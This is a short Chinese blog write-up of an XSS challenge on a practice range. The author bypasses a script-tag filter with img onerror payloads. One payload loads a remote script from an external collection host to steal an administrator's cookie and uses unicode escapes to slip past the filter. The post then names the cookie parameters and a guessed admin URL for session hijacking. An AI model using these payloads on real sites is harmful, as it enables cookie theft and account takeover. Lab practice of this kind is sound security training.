安鸾靶场XSS挖掘&绕过

文章讲述了作者尝试在网页中注入XSS代码,最初使用`<scirp>`标签被过滤,然后通过编码`<script>`标签和构造`<img>`标签的JavaScript代码绕过过滤。作者还提到需要管理员的cookie和特定参数才能成功执行脚本,并猜测了一个可能的管理员界面地址。
摘要由CSDN通过智能技术生成

传统方法试一下,发现scirp标签被过滤掉了

<script>alert("xss");</script>

直接换一种标签接着测肯能不能弹窗

<img src=1 οnerrοr=alert("xss");>

使用<img>标签时弹窗了,说明没有对img标签进行过滤

自己构造一个img标签的js代码,让管理员带着cookie来见我

<img src=x οnerrοr=s=createElement('script');body.appendChild(s);s.src='http://vpn.whalwl.work:18080/5GlYEi?1690861593';>

 

没注意到上面的语句还有一个'scirp',导致被过滤,js语法错误

重新构造,给scirp转码绕过

<img src=x οnerrοr=s=createElement('\u0073\u0063\u0072\u0069\u0070\u0074');body.appendChild(s);s.src='http://vpn.whalwl.work:18080/5GlYEi?1690861593';>

 

 

绕过成功了  

 

发现有三个必要参数,cookie,roc_login,roc_secure

把这三个弄到小饼干上,盲猜一波管理员网站的地址是admin,http://106.15.50.112:8013/admin

回车

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值